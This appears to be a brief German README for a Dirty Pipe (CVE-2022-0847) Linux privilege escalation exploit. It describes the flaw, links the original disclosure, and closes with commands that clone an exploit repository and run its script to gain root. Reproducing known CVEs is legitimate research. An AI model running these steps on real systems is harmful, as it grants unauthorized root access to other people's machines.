
CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 ist eine lokale Privilegienausweitung-Schwachstelle im Linux-Kernel 5.8 und späteren Versionen. Durch die Ausnutzung dieser Schwachstelle können Angreifer Daten in beliebigen lesbaren Dateien überschreiben und so einen normalen Benutzer auf privilegiertes root erhöhen. Das Prinzip der CVE-2022-0847-Schwachstelle ähnelt der Dirty-Cow-Schwachstelle CVE-2016-5195, ist jedoch einfacher auszunutzen. Der Autor der Schwachstelle nannte sie „Dirty Pipe“.
Einfache Reproduktion von CVE-2022-0847
Original-Offenlegung: https://dirtypipe.cm4all.com/
Linux kali 5.10.0-kali7-amd64 #1 SMP Debian 5.10.28-1kali1 (2021-04-12) x86_64 GNU/Linux
gcc
git clone https://github.com/imfiver/CVE-2022-0847.git
cd CVE-2022-0847
chmod +x Dirty-Pipe.sh
bash Dirty-Pipe.sh
